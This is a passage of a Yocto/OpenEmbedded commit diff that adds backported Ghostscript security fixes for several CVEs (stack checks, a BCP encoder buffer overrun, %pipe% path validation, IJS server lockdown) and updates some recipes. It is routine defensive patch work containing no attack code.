+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=2a3129365d3bc0d4a41f107ef175920d1505d1f7]
+CVE: CVE-2021-45949
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ psi/zfsample.c | 13 ++++++++-----
+ 1 file changed, 8 insertions(+), 5 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 0023fa4..f84671f 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -534,14 +534,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ data_ptr[bps * i + j] = (byte)(cv >> ((bps - 1 - j) * 8)); /* MSB first */
+ }
+ pop(num_out); /* Move op to base of result values */
+-
++ /* From here on, we have to use ref_stack_pop() rather than pop()
++ so that it handles stack extension blocks properly, before calling
++ sampled_data_sample() which also uses the op stack.
++ */
+ /* Check if we are done collecting data. */
+
+ if (increment_cube_indexes(params, penum->indexes)) {
+ if (stack_depth_adjust == 0)
+- pop(O_STACK_PAD); /* Remove spare stack space */
++ ref_stack_pop(&o_stack, O_STACK_PAD); /* Remove spare stack space */
+ else
+- pop(stack_depth_adjust - num_out);
++ ref_stack_pop(&o_stack, stack_depth_adjust - num_out);
+ /* Execute the closing procedure, if given */
+ code = 0;
+ if (esp_finish_proc != 0)
+@@ -554,11 +557,11 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ if ((O_STACK_PAD - stack_depth_adjust) < 0) {
+ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
+ check_op(stack_depth_adjust);
+- pop(stack_depth_adjust);
++ ref_stack_pop(&o_stack, stack_depth_adjust);
+ }
+ else {
+ check_ostack(O_STACK_PAD - stack_depth_adjust);
+- push(O_STACK_PAD - stack_depth_adjust);
++ ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust);
+ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+ make_null(op - i);
+ }
+--
+2.17.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
new file mode 100644
index 0000000000..852f2459f7
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
@@ -0,0 +1,54 @@
+From 37ed5022cecd584de868933b5b60da2e995b3179 Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Fri, 24 Mar 2023 13:19:57 +0000
+Subject: [PATCH] Graphics library - prevent buffer overrun in (T)BCP encoding
+
+Bug #706494 "Buffer Overflow in s_xBCPE_process"
+
+As described in detail in the bug report, if the write buffer is filled
+to one byte less than full, and we then try to write an escaped
+character, we overrun the buffer because we don't check before
+writing two bytes to it.
+
+This just checks if we have two bytes before starting to write an
+escaped character and exits if we don't (replacing the consumed byte
+of the input).
+
+Up for further discussion; why do we even permit a BCP encoding filter
+anyway? I think we should remove this, at least when SAFER is true.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=37ed5022cecd584de868933b5b60da2e995b3179]
+CVE: CVE-2023-28879
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/sbcp.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/base/sbcp.c b/base/sbcp.c
+index 6b0383c..90784b5 100644
+--- a/base/sbcp.c
++++ b/base/sbcp.c
+@@ -1,4 +1,4 @@
+-/* Copyright (C) 2001-2019 Artifex Software, Inc.
++/* Copyright (C) 2001-2023 Artifex Software, Inc.
+ All Rights Reserved.
+
+ This software is provided AS-IS with no warranty, either express or
+@@ -50,6 +50,14 @@ s_xBCPE_process(stream_state * st, stream_cursor_read * pr,
+ byte ch = *++p;
+
+ if (ch <= 31 && escaped[ch]) {
++ /* Make sure we have space to store two characters in the write buffer,
++ * if we don't then exit without consuming the input character, we'll process
++ * that on the next time round.
++ */
++ if (pw->limit - q < 2) {
++ p--;
++ break;
++ }
+ if (p == rlimit) {
+ p--;
+ break;
+--
+2.25.1
+
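Editor's note: the fix above reserves space for both bytes of an escape sequence before emitting either of them. A standalone sketch of the same encoder rule (hypothetical buffer handling and escape marker, not the ghostscript stream machinery):

    /* sketch: stop encoding when an escape sequence would not fit */
    #include <assert.h>
    #include <stddef.h>

    /* returns the number of input bytes consumed */
    static size_t encode (const unsigned char *in, size_t inlen,
                          unsigned char *out, size_t outlen)
    {
      size_t i = 0, o = 0;

      while (i < inlen)
        {
          unsigned char ch = in[i];

          if (ch <= 31)              /* needs escaping: writes two bytes */
            {
              if (outlen - o < 2)    /* not enough room: leave ch for the next call */
                break;
              out[o++] = 0x01;       /* assumed escape marker */
              out[o++] = ch ^ 0x40;
            }
          else
            {
              if (outlen - o < 1)
                break;
              out[o++] = ch;
            }
          i++;
        }
      return i;
    }

    int main (void)
    {
      unsigned char out[3];
      const unsigned char in[] = { 'A', 0x03, 'B' };

      /* only 'A' and the escaped 0x03 fit; 'B' is left for the next round */
      assert (encode (in, sizeof in, out, sizeof out) == 2);
      return 0;
    }
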
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
new file mode 100644
index 0000000000..a3bbe958eb
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
@@ -0,0 +1,145 @@
+From 5e65eeae225c7d02d447de5abaf4a8e6d234fcea Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 7 Jun 2023 10:23:06 +0100
+Subject: [PATCH] Bug 706761: Don't "reduce" %pipe% file names for permission validation
+
+For regular file names, we try to simplfy relative paths before we use them.
+
+Because the %pipe% device can, effectively, accept command line calls, we
+shouldn't be simplifying that string, because the command line syntax can end
+up confusing the path simplifying code. That can result in permitting a pipe
+command which does not match what was originally permitted.
+
+Special case "%pipe" in the validation code so we always deal with the entire
+string.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=505eab7782b429017eb434b2b95120855f2b0e3c]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 31 +++++++++++++++++++--------
+ base/gslibctx.c | 56 ++++++++++++++++++++++++++++++++++++-------------
+ 2 files changed, 64 insertions(+), 23 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index c4fffae..09ac6b3 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1046,16 +1046,29 @@ gp_validate_path_len(const gs_memory_t *mem,
+ && !memcmp(path + cdirstrl, dirsepstr, dirsepstrl)) {
+ prefix_len = 0;
+ }
+- rlen = len+1;
+- bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+- if (bufferfull == NULL)
+- return gs_error_VMerror;
+-
+- buffer = bufferfull + prefix_len;
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
+
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len+1;
++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
++ if (bufferfull == NULL)
++ return gs_error_VMerror;
++
++ buffer = bufferfull + prefix_len;
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+ while (1) {
+ switch (mode[0])
+ {
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 20c5eee..355c0e3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -719,14 +719,28 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+ return gs_error_rangecheck;
+ }
+
+- rlen = len+1;
+- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+- if (buffer == NULL)
+- return gs_error_VMerror;
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len + 1;
+
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_add_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+
+ n = control->num;
+ for (i = 0; i < n; i++)
+@@ -802,14 +816,28 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+ return gs_error_rangecheck;
+ }
+
+- rlen = len+1;
+- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+- if (buffer == NULL)
+- return gs_error_VMerror;
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len+1;
+
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_remove_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+
+ n = control->num;
+ for (i = 0; i < n; i++) {
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
new file mode 100644
index 0000000000..e8c42f1deb
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
@@ -0,0 +1,60 @@
+From fb342fdb60391073a69147cb71af1ac416a81099 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 14 Jun 2023 09:08:12 +0100
+Subject: [PATCH] Bug 706778: 706761 revisit
+
+Two problems with the original commit. The first was a silly typo inverting the
+logic of a test.
+
+The second was forgetting that we actually validate two candidate
+strings for pipe devices. One with the expected "%pipe%" prefix, the other
+using the pipe character prefix: "|".
+
+This addresses both those.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=fb342fdb60391073a69147cb71af1ac416a81099]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 2 +-
+ base/gslibctx.c | 4 ++--
+ 2 files changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 09ac6b3..01d449f 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1050,7 +1050,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 355c0e3..d8f74a3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -722,7 +722,7 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+@@ -819,7 +819,7 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+--
+2.25.1
+
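Editor's note: the corrected test in the follow-up above accepts either spelling of a pipe destination. A small standalone sketch of the same prefix check (assumed helper name, not the ghostscript source):

    /* sketch: detect both ways a pipe output can be spelled */
    #include <assert.h>
    #include <string.h>

    static int is_pipe_path (const char *path)
    {
      size_t len = strlen (path);

      return path[0] == '|' || (len > 5 && memcmp (path, "%pipe", 5) == 0);
    }

    int main (void)
    {
      assert (is_pipe_path ("|lpr -P office"));
      assert (is_pipe_path ("%pipe%lpr -P office"));
      assert (!is_pipe_path ("/tmp/out-%03d.pdf"));
      return 0;
    }
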
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
new file mode 100644
index 0000000000..662736bb3d
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
@@ -0,0 +1,62 @@
+From 4ceaf92815302863a8c86fcfcf2347e0118dd3a5 Mon Sep 17 00:00:00 2001
+From: Ray Johnston <ray.johnston@artifex.com>
+Date: Tue, 22 Sep 2020 13:10:04 -0700
+Subject: [PATCH] Fix gp_file allocations to use thread_safe_memory.
+
+gpmisc.c does allocations for gp_file objects and buffers used by
+gp_fprintf, as well as gp_validate_path_len. The helgrind run with
+-dBGPrint -dNumRenderingThreads=4 and PCL input showed up the gp_fprintf
+problem since the clist rendering would call gp_fprintf using the same
+allocator (PCL's chunk allocator which is non_gc_memory). The chunk
+allocator is intentionally not thread safe (for performance).
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4ceaf92815302863a8c86fcfcf2347e0118dd3a5]
+CVE: CVE-2023-36664 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 34cd71f..c4fffae 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -435,7 +435,7 @@ generic_pwrite(gp_file *f, size_t count, gs_offset_t offset, const void *buf)
+
+ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t size, const char *cname)
+ {
+- gp_file *file = (gp_file *)gs_alloc_bytes(mem->non_gc_memory, size, cname ? cname : "gp_file");
++ gp_file *file = (gp_file *)gs_alloc_bytes(mem->thread_safe_memory, size, cname ? cname : "gp_file");
+ if (file == NULL)
+ return NULL;
+
+@@ -449,7 +449,7 @@ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t
+ memset(((char *)file)+sizeof(*prototype),
+ 0,
+ size - sizeof(*prototype));
+- file->memory = mem->non_gc_memory;
++ file->memory = mem->thread_safe_memory;
+
+ return file;
+ }
+@@ -1047,7 +1047,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ prefix_len = 0;
+ }
+ rlen = len+1;
+- bufferfull = (char *)gs_alloc_bytes(mem->non_gc_memory, rlen + prefix_len, "gp_validate_path");
++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+ if (bufferfull == NULL)
+ return gs_error_VMerror;
+
+@@ -1093,7 +1093,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ break;
+ }
+
+- gs_free_object(mem->non_gc_memory, bufferfull, "gp_validate_path");
++ gs_free_object(mem->thread_safe_memory, bufferfull, "gp_validate_path");
+ #ifdef EACCES
+ if (code == gs_error_invalidfileaccess)
+ errno = EACCES;
+--
+2.25.1
+
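
The change above amounts to "allocate gp_file objects and gp_fprintf buffers from
the thread-safe allocator, and free them from the same place". A generic sketch of
that remember-your-allocator pattern follows; the types and names are hypothetical
stand-ins, not Ghostscript's gs_memory_t API:

    #include <stdio.h>
    #include <stdlib.h>

    /* Hypothetical allocator handle; the real gs_memory_t is far richer. */
    typedef struct allocator {
        void *(*alloc)(size_t);
        void  (*release)(void *);
    } allocator;

    typedef struct gp_file_like {
        const allocator *memory;   /* remember which allocator created us */
        /* ... file state would live here ... */
    } gp_file_like;

    static gp_file_like *file_alloc(const allocator *mem)
    {
        gp_file_like *f = mem->alloc(sizeof(*f));
        if (f != NULL)
            f->memory = mem;       /* the matching free must use this pool */
        return f;
    }

    static void file_free(gp_file_like *f)
    {
        if (f != NULL)
            f->memory->release(f);
    }

    int main(void)
    {
        allocator thread_safe = { malloc, free };  /* stand-in for thread_safe_memory */
        gp_file_like *f = file_alloc(&thread_safe);
        file_free(f);
        puts("allocated and freed from the same pool");
        return 0;
    }
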
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
new file mode 100644
index 0000000000..3acb8a503c
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
@@ -0,0 +1,62 @@
+From 8b0f20002536867bd73ff4552408a72597190cbe Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Thu, 24 Aug 2023 15:24:35 +0100
+Subject: [PATCH] IJS device - try and secure the IJS server startup
+
+Bug #707051 ""ijs" device can execute arbitrary commands"
+
+The problem is that the 'IJS' device needs to start the IJS server, and
+that is indeed an arbitrary command line. There is (apparently) no way
+to validate it. Indeed, this is covered quite clearly in the comments
+at the start of the source:
+
+ * WARNING: The ijs server can be selected on the gs command line
+ * which is a security risk, since any program can be run.
+
+Previously this used the awful LockSafetyParams hackery, which we
+abandoned some time ago because it simply couldn't be made secure (it
+was implemented in PostScript and was therefore vulnerable to PostScript
+programs).
+
+This commit prevents PostScript programs switching to the IJS device
+after SAFER has been activated, and prevents changes to the IjsServer
+parameter after SAFER has been activated.
+
+SAFER is activated, unless explicitly disabled, before any user
+PostScript is executed which means that the device and the server
+invocation can only be configured on the command line. This does at
+least provide minimal security against malicious PostScript programs.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5]
+CVE: CVE-2023-43115
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ devices/gdevijs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/devices/gdevijs.c b/devices/gdevijs.c
+index 3d337c5..e50d69f 100644
+--- a/devices/gdevijs.c
++++ b/devices/gdevijs.c
+@@ -934,6 +934,9 @@ gsijs_finish_copydevice(gx_device *dev, const gx_device *from_dev)
+ static const char rgb[] = "DeviceRGB";
+ gx_device_ijs *ijsdev = (gx_device_ijs *)dev;
+
++ if (ijsdev->memory->gs_lib_ctx->core->path_control_active)
++ return_error(gs_error_invalidaccess);
++
+ code = gx_default_finish_copydevice(dev, from_dev);
+ if(code < 0)
+ return code;
+@@ -1363,7 +1366,7 @@ gsijs_put_params(gx_device *dev, gs_param_list *plist)
+ if (code >= 0)
+ code = gsijs_read_string(plist, "IjsServer",
+ ijsdev->IjsServer, sizeof(ijsdev->IjsServer),
+- dev->LockSafetyParams, is_open);
++ ijsdev->memory->gs_lib_ctx->core->path_control_active, is_open);
+
+ if (code >= 0)
+ code = gsijs_read_string_malloc(plist, "DeviceManufacturer",
+--
+2.25.1
+
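
The protection pattern is straightforward: once path controls (SAFER) are active,
refuse both switching to the ijs device and changing its IjsServer parameter, so
the server command line can only be configured before untrusted PostScript runs.
A tiny generic sketch of that "lock after activation" gate, with hypothetical
names rather than Ghostscript's structures:

    #include <errno.h>
    #include <stdio.h>

    struct dev_ctx {
        int  path_control_active;   /* set once SAFER is engaged */
        char server_cmd[128];
    };

    /* Allow the security-sensitive server command to change only while
     * path controls are not yet active. */
    static int set_server_cmd(struct dev_ctx *ctx, const char *cmd)
    {
        if (ctx->path_control_active)
            return -EACCES;
        snprintf(ctx->server_cmd, sizeof(ctx->server_cmd), "%s", cmd);
        return 0;
    }

    int main(void)
    {
        struct dev_ctx ctx = { 0 };
        printf("before lock: %d\n", set_server_cmd(&ctx, "hpijs"));
        ctx.path_control_active = 1;          /* SAFER engaged */
        printf("after lock:  %d\n", set_server_cmd(&ctx, "evil-cmd"));
        return 0;
    }
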
diff --git a/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
new file mode 100644
index 0000000000..77eec7d158
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
@@ -0,0 +1,51 @@
+From 7861fcad13c497728189feafb41cd57b5b50ea25 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 12 Feb 2021 10:34:23 +0000
+Subject: [PATCH] oss-fuzz 30715: Check stack limits after function evaluation.
+
+During function result sampling, after the callout to the Postscript
+interpreter, make sure there is enough stack space available before pushing
+or popping entries.
+
+In this case, the Postscript procedure for the "function" is totally invalid
+(as a function), and leaves the op stack in an unrecoverable state (as far as
+function evaluation is concerned). We end up popping more entries off the
+stack than are available.
+
+To cope, add in stack limit checking to throw an appropriate error when this
+happens.
+CVE: CVE-2021-45944
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25]
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ psi/zfsample.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 290809405..652ae02c6 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -551,9 +551,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ } else {
+ if (stack_depth_adjust) {
+ stack_depth_adjust -= num_out;
+- push(O_STACK_PAD - stack_depth_adjust);
+- for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+- make_null(op - i);
++ if ((O_STACK_PAD - stack_depth_adjust) < 0) {
++ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
++ check_op(stack_depth_adjust);
++ pop(stack_depth_adjust);
++ }
++ else {
++ check_ostack(O_STACK_PAD - stack_depth_adjust);
++ push(O_STACK_PAD - stack_depth_adjust);
++ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
++ make_null(op - i);
++ }
+ }
+ }
+
+--
+2.25.1
+
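
The fix boils down to: when the remaining stack adjustment turns out negative, pop
entries (after checking they exist) instead of blindly pushing pad entries, and
when it is positive, verify there is room before pushing nulls. A small
self-contained sketch of that guarded adjustment on a plain array stack
(illustrative only, not Ghostscript's operand-stack macros):

    #include <stdio.h>

    #define STACK_CAP 8

    struct stack { int items[STACK_CAP]; int depth; };

    /* Adjust the stack by 'want' pad entries: push nulls (0) when 'want' is
     * positive, pop entries when it is negative, and report an error rather
     * than under- or overflowing. */
    static int pad_stack(struct stack *s, int want)
    {
        if (want < 0) {
            int drop = -want;
            if (drop > s->depth)
                return -1;              /* would pop more than is available */
            s->depth -= drop;
        } else {
            if (s->depth + want > STACK_CAP)
                return -1;              /* would overflow the stack */
            for (int i = 0; i < want; i++)
                s->items[s->depth++] = 0;
        }
        return 0;
    }

    int main(void)
    {
        struct stack s = { .depth = 2 };
        printf("pad +3 -> %d, depth %d\n", pad_stack(&s, 3), s.depth);
        printf("pad -9 -> %d, depth %d\n", pad_stack(&s, -9), s.depth);
        return 0;
    }
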
diff --git a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
index 65135f5821..e57f592892 100644
--- a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
+++ b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
@@ -19,6 +19,10 @@ DEPENDS_class-native = "libpng-native"
UPSTREAM_CHECK_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases"
UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)\.tar"
+# The jpeg issue in the CVE is present in the gs jpeg sources;
+# however, we use an external jpeg which doesn't have the issue.
+CVE_CHECK_WHITELIST += "CVE-2013-6629"
+
def gs_verdir(v):
return "".join(v.split("."))
@@ -29,12 +33,24 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d
file://do-not-check-local-libpng-source.patch \
file://avoid-host-contamination.patch \
file://mkdir-p.patch \
+ file://CVE-2020-15900.patch \
+ file://check-stack-limits-after-function-evalution.patch \
+ file://CVE-2021-45949.patch \
+ file://CVE-2021-3781_1.patch \
+ file://CVE-2021-3781_2.patch \
+ file://CVE-2021-3781_3.patch \
+ file://CVE-2023-28879.patch \
+ file://0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch \
+ file://CVE-2023-36664-pre1.patch \
+ file://CVE-2023-36664-1.patch \
+ file://CVE-2023-36664-2.patch \
+ file://CVE-2023-43115.patch \
+ file://CVE-2020-36773.patch \
"
SRC_URI = "${SRC_URI_BASE} \
file://ghostscript-9.21-prevent_recompiling.patch \
file://cups-no-gcrypt.patch \
- file://CVE-2020-15900.patch \
"
SRC_URI_class-native = "${SRC_URI_BASE} \
diff --git a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
index ab70ea98a3..7d0f74186e 100644
--- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
+++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master"
SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-extended/grep/grep_3.4.bb b/meta/recipes-extended/grep/grep_3.4.bb
index e176dd727b..46ac4cfb00 100644
--- a/meta/recipes-extended/grep/grep_3.4.bb
+++ b/meta/recipes-extended/grep/grep_3.4.bb
@@ -1,5 +1,6 @@
SUMMARY = "GNU grep utility"
HOMEPAGE = "http://savannah.gnu.org/projects/grep/"
+DESCRIPTION = "Grep searches one or more input files for lines containing a match to a specified pattern. By default, grep prints the matching lines."
BUGTRACKER = "http://savannah.gnu.org/bugs/?group=grep"
SECTION = "console/utils"
LICENSE = "GPLv3"
diff --git a/meta/recipes-extended/groff/files/0001-Include-config.h.patch b/meta/recipes-extended/groff/files/0001-Include-config.h.patch
index 348a61d9df..46065bc513 100644
--- a/meta/recipes-extended/groff/files/0001-Include-config.h.patch
+++ b/meta/recipes-extended/groff/files/0001-Include-config.h.patch
@@ -17,6 +17,9 @@ In file included from TOPDIR/build/tmp/work/aarch64-yoe-linux-musl/groff/1.22.4-
^
./lib/math.h:40:1: error: unknown type name '_GL_INLINE_HEADER_BEGIN'
+We delete eqn.cpp and eqn.hpp in do_configure
+to ensure they are regenerated and the build is deterministic.
+
Upstream-Status: Pending
Signed-off-by: Khem Raj <raj.khem@gmail.com>
---
@@ -140,1029 +143,6 @@ index f95c05e..d875045 100644
#include <string.h>
#include <stdlib.h>
-diff --git a/src/preproc/eqn/eqn.cpp b/src/preproc/eqn/eqn.cpp
-index 4ede465..fdd9484 100644
---- a/src/preproc/eqn/eqn.cpp
-+++ b/src/preproc/eqn/eqn.cpp
-@@ -1,8 +1,9 @@
--/* A Bison parser, made by GNU Bison 3.2. */
-+/* A Bison parser, made by GNU Bison 3.4.1. */
-
- /* Bison implementation for Yacc-like parsers in C
-
-- Copyright (C) 1984, 1989-1990, 2000-2015, 2018 Free Software Foundation, Inc.
-+ Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2019 Free Software Foundation,
-+ Inc.
-
- This program is free software: you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
-@@ -47,7 +48,7 @@
- #define YYBISON 1
-
